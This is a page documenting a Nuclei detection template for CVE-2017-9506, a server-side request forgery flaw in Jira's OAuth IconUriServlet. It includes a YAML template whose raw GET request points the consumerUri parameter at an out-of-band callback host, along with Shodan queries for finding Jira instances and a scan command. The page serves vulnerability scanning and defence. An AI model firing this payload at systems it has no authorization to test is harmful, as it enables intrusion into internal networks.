Skip to content
Nuclei Templates

Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery

ID: CVE-2017-9506

Severity: medium

Author: pdteam

Tags: cve,cve2017,atlassian,jira,ssrf,oast

Description

Section titled “Description”

The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.

YAML Source

Section titled “YAML Source”
id: CVE-2017-9506


info:
  name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
  author: pdteam
  severity: medium
  description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential server-side attacks.
  remediation: |
    Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities.
  reference:
    - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
    - https://ecosystem.atlassian.net/browse/OAUTH-344
    - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9506
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-9506
    cwe-id: CWE-918
    epss-score: 0.00575
    epss-percentile: 0.77897
    cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: oauth
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2017,atlassian,jira,ssrf,oast


http:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100efbb9ea8d19c6a3930cee9c8777e2f432c25319a1a7b554b2a5aaf222250bdfb02205a22fcf37c154ff5d095d6c680fb6ff90c217e8345386d3914287589b91aefa6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-9506.yaml"

View on Github